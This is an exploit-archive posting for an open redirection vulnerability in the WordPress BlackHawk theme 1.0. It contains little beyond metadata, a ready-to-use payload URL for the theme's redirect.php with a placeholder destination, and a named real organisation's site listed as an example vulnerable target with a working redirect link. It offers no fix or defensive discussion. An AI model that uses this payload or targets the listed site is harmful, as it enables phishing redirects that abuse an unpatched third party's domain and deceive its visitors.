WordPress BlackHawk 1.0 Open Redirection

WordPress BlackHawk theme version 1.0 suffers from an open redirection vulnerability.


MD5 | 8637148cf6e7634da3d020391c1054f2

#################################################################################################

# Exploit Title : WordPress BlackHawk Themes 1.0 Open Redirection
Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Vendor Homepage : wordpress.org ~ themetix.com/black-hawk/
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Low
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110206
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2268
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31542
# Vulnerability Type : CWE-601 - URL Redirection to Untrusted Site ('Open
Redirect')

#################################################################################################

# Exploit :

/wp-content/themes/blackhawk/library/redirect.php?url=
http://www.REDIRECTIONADDRESS.gov/

#################################################################################################

# Example Vulnerable Site =>

[+]
bhccu.org/wp-content/themes/blackhawk/library/redirect.php?url=https://packetstormsecurity.com/

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts